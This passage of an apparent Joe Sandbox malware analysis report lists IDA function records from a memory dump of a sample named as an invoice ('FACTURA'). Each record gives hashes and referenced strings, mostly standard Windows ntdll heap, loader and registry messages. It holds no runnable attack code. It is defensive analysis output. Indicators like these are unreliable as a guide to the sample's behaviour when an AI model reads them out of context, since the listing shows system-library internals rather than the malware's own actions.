                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit$l/I5
                                                                                                                                                                                                                          • API String ID: 0-1631256039
                                                                                                                                                                                                                          • Opcode ID: a7358caab6514616873a200f0e2544bee2e2f1fad09cd94aaf564dd5bdae78ce
                                                                                                                                                                                                                          • Instruction ID: 930fe3e37a7b8ceb4faab096ae1f90ea20a392591643788ee0cfa53283101630
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7358caab6514616873a200f0e2544bee2e2f1fad09cd94aaf564dd5bdae78ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B41E27AA04354EBEB19CBA4C880B9CB7B8FF85740F2000DAD811EB391FB758941CB11
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                          • API String ID: 0-1391187441
                                                                                                                                                                                                                          • Opcode ID: 61ed593d93e11c56b81e21f774beb66bb4e3ed760dd534ac1f5a4ef621bb979f
                                                                                                                                                                                                                          • Instruction ID: c3b8e1da2c7e4cd102c4eac48c67649f563b14d8660975027c26120c93f62504
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ed593d93e11c56b81e21f774beb66bb4e3ed760dd534ac1f5a4ef621bb979f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4231D576A00214EFEB09CB56CC84FDAB7B9FF457A0F1140A5E815AB391D731E940CE60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eF5
                                                                                                                                                                                                                          • API String ID: 0-308786184
                                                                                                                                                                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                          • Instruction ID: 4b238861dc360721504862431b88074c3b1bd0a4e4137c43a6e474978d8273ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C53152B2A04659BBDB1ACB94CC44EDEBBBDEF84754F104029E525B7260EB30DA05DB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                                                                                                          • API String ID: 0-1880532218
                                                                                                                                                                                                                          • Opcode ID: 5512db7b2451f4f7b08f252120c1c7c1f89c93e074c898a5a773b6ca3232636b
                                                                                                                                                                                                                          • Instruction ID: 4305aa8069f2ea0eb622795d5a250444d06f5f4dbfa763994eefb10ada15dc0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5512db7b2451f4f7b08f252120c1c7c1f89c93e074c898a5a773b6ca3232636b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2217B79A012809BDB09CB58DD41FDAB3F5AF45740F1550A9E886E7340E7B4D905C760
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: f45654e26ebc138ba87cfbe217858358a4c8f897535071a0fe6c4fca493c31a6
                                                                                                                                                                                                                          • Instruction ID: 3f7c05cb1ebcc19a4f3113122c838c771864ed14d05745176fafa7880928a848
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f45654e26ebc138ba87cfbe217858358a4c8f897535071a0fe6c4fca493c31a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512535A01705EFEB0DCF64C945B9DBBB1BF48325F1041AAE552973A0DB709A21CF80
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                                          • API String ID: 0-1168191160
                                                                                                                                                                                                                          • Opcode ID: 5539635d4040db084653c8374e110ebcded10e41f77777eaab3e10ee899ef027
                                                                                                                                                                                                                          • Instruction ID: 1658a1358fb96dc2cddee9662dfc1d516f94c49c374659f8603641f31ad03e10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5539635d4040db084653c8374e110ebcded10e41f77777eaab3e10ee899ef027
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F18EB9A052289BDB28CB14CCC0BD9B3B5BF84754F5080E9D509AB341FB719E85CF59
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35431648
                                                                                                                                                                                                                          • HEAP: , xrefs: 354314B6
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 35431632
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                                                          • Opcode ID: 810dc30b5afb167bc41e7329c9e2747d75e0bd8165169b792eb09c1fe22a6326
                                                                                                                                                                                                                          • Instruction ID: 320dbce6672888e7e8fc54c8966013454ac74a863a88d805817021c237bf4b6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 810dc30b5afb167bc41e7329c9e2747d75e0bd8165169b792eb09c1fe22a6326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E1F174A053859BE71CCF68C482ABABBF1BF48300F1488ADE4968B356E774E955CB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 354A00C7
                                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 354A0128
                                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 354A00F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                                          • Opcode ID: 530ab8ccf7292877401b6fb57159e2310ec03963d16bbc549e3fa5ee2bc83ac2
                                                                                                                                                                                                                          • Instruction ID: 961b20d5dd3599af877fca81252ada639d2a977a4f715969dec6e979d000b5f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 530ab8ccf7292877401b6fb57159e2310ec03963d16bbc549e3fa5ee2bc83ac2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE1B0B5608741AFE719CF28C880B4AB7E1BF84364F100A9DF5A58B3D1DB75E945CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                                          • API String ID: 0-2391371766
                                                                                                                                                                                                                          • Opcode ID: c9d1905f8a285d0d51281c1638f84094198883afddc5ae67022de1feb36b4ba8
                                                                                                                                                                                                                          • Instruction ID: 033c8243e46b086254746e0c46088cfa21f2c0f07aa6b0c569b20bfca3ee0f7a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d1905f8a285d0d51281c1638f84094198883afddc5ae67022de1feb36b4ba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABB192B5618341AFE715CF55C880B5BB7F8FB48754F400969FA909B250EBF0E848CBA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                                                          • API String ID: 0-3870751728
                                                                                                                                                                                                                          • Opcode ID: ca64edd244a1b72ebee25975dbe181abdb024ce566083c6b3d41e53df4a4db22
                                                                                                                                                                                                                          • Instruction ID: c45ea359bf68a223550c73a65d0236310c98db6b9a23a9422399067ff1e4b57d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca64edd244a1b72ebee25975dbe181abdb024ce566083c6b3d41e53df4a4db22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30913CB4E002059FEB1CCFA9C980B9DB7F1BF48314F14816AE945AB391E7B59842CF64
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3550B3AA
                                                                                                                                                                                                                          • TargetNtPath, xrefs: 3550B3AF
                                                                                                                                                                                                                          • GlobalizationUserSettings, xrefs: 3550B3B4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                          • API String ID: 0-505981995
                                                                                                                                                                                                                          • Opcode ID: b0b713fcdfea9f93a1da5c3c8ef0b84330e9cdef5e33750f25265f8656cc99a5
                                                                                                                                                                                                                          • Instruction ID: 84a0bd1764e7bad2ec223e58819f1f3e5a8854c10ac8ffad99c4f8f38b99b6a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0b713fcdfea9f93a1da5c3c8ef0b84330e9cdef5e33750f25265f8656cc99a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37617F72D41229ABDB25DF54DC88BDEB7B8BB04724F5101E9A508AB250DB74EE84CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3548E455
                                                                                                                                                                                                                          • HEAP: , xrefs: 3548E442
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 3548E435
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                          • API String ID: 0-1340214556
                                                                                                                                                                                                                          • Opcode ID: 1e54903326818489d689e4eb67a44eed3d2a7cc46eed3640135bf342b0b3d581
                                                                                                                                                                                                                          • Instruction ID: 09ed64ed470f03c58c6136a53f60141eaf9594526e4881039b64958554614faf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e54903326818489d689e4eb67a44eed3d2a7cc46eed3640135bf342b0b3d581
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B510D35604794AFE31ACBA8C885F8AFBF8FF04744F4040A8E5418B792D774EA41CB51
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3549A396
                                                                                                                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3549A3A7
                                                                                                                                                                                                                          • LdrpCompleteMapModule, xrefs: 3549A39D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                          • API String ID: 0-1676968949
                                                                                                                                                                                                                          • Opcode ID: 562e56a52f3781fc282346b3229ae4f8c5db5206b19518b3ea4cc9e5f17c5f3e
                                                                                                                                                                                                                          • Instruction ID: 8f566a54b1fc1a137dc1f7af01ad3dd02d76cdb8ee43dbaac8ed94743d900988
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 562e56a52f3781fc282346b3229ae4f8c5db5206b19518b3ea4cc9e5f17c5f3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7514475B047899BEB1DCB58C845B5A7BF1BB00764F100AD8EC929B7E2DB70E900CB44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 354DD7B2
                                                                                                                                                                                                                          • HEAP: , xrefs: 354DD79F
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 354DD792
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                          • API String ID: 0-3815128232
                                                                                                                                                                                                                          • Opcode ID: 55880826be266b7c17bb29936ec8c815d2bd5182f3daf0446f9de9df6ed58059
                                                                                                                                                                                                                          • Instruction ID: 86c06cbbcb055cfa6804221e3eec761d2d5a93072360fe2286bd306cd641d2b3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55880826be266b7c17bb29936ec8c815d2bd5182f3daf0446f9de9df6ed58059
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512578104350CEE39CCA29C864772F7E1EB45284F5248DEE4D68B686DB66E847DBA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                          • API String ID: 0-1151232445
                                                                                                                                                                                                                          • Opcode ID: 32ee1d16cacb51181d0009284a4ec9e2990c997995a5e10c5dcdfd5f692c3972
                                                                                                                                                                                                                          • Instruction ID: 4ab96a2f5005897389271606e9abb0338658088a9c28fa7875408fb18aa9e9f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ee1d16cacb51181d0009284a4ec9e2990c997995a5e10c5dcdfd5f692c3972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC4169782043508FEB1DCE19C184BA5B7F2BF01365F6484EED8468BB52DBB6D486CB61
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpAllocateTls, xrefs: 354A194A
                                                                                                                                                                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 354A1943
                                                                                                                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 354A1954
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                          • API String ID: 0-4274184382
                                                                                                                                                                                                                          • Opcode ID: 2df201fce6afd745bc8561055d5dc43d50286dfb5257c13fa4f3d4876cd3621f
                                                                                                                                                                                                                          • Instruction ID: d05f2c2ed69c02dbdd7798c71dfacfd3caa37efc788dbacb0115580f8070a8bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df201fce6afd745bc8561055d5dc43d50286dfb5257c13fa4f3d4876cd3621f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C04188B6A00644AFDB19CFA8D841BAEBBF5FF58704F05816DE406A7351DB35A901CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • PreferredUILanguages, xrefs: 354EBD92
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 354EBD45
                                                                                                                                                                                                                          • @, xrefs: 354EBD71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                                                                          • Opcode ID: 3bf831ad82401e550251298c41cced4e4c4406eb6c2335e12e7921a77ce1f2dc
                                                                                                                                                                                                                          • Instruction ID: 14b42c55a0f1b4a66dd5c14eee5a92fb162545055b936d99ea8e077405d188e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf831ad82401e550251298c41cced4e4c4406eb6c2335e12e7921a77ce1f2dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B04181B2E05309EBEB19DF98C890FEEB7B8BF04745F5040A9E605B7280D7749A45CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 354BB2B2
                                                                                                                                                                                                                          • GlobalFlag, xrefs: 354BB30F
                                                                                                                                                                                                                          • @, xrefs: 354BB2F0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                          • API String ID: 0-4192008846
                                                                                                                                                                                                                          • Opcode ID: 9076c7159c5e0def60617dd8a79932bff1a0387c5e10fd571bf95b329da4c2b4
                                                                                                                                                                                                                          • Instruction ID: b726f01e5662f9c114eb911a194da3439833188c298d5273ff40a032ffdbe618
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9076c7159c5e0def60617dd8a79932bff1a0387c5e10fd571bf95b329da4c2b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B316FB1E00209AFDF08DF95DC81AEEBBBCEF04744F4404ADE611A7251DBB49A04CBA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpInitializeTls, xrefs: 354A1851
                                                                                                                                                                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 354A184A
                                                                                                                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 354A185B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
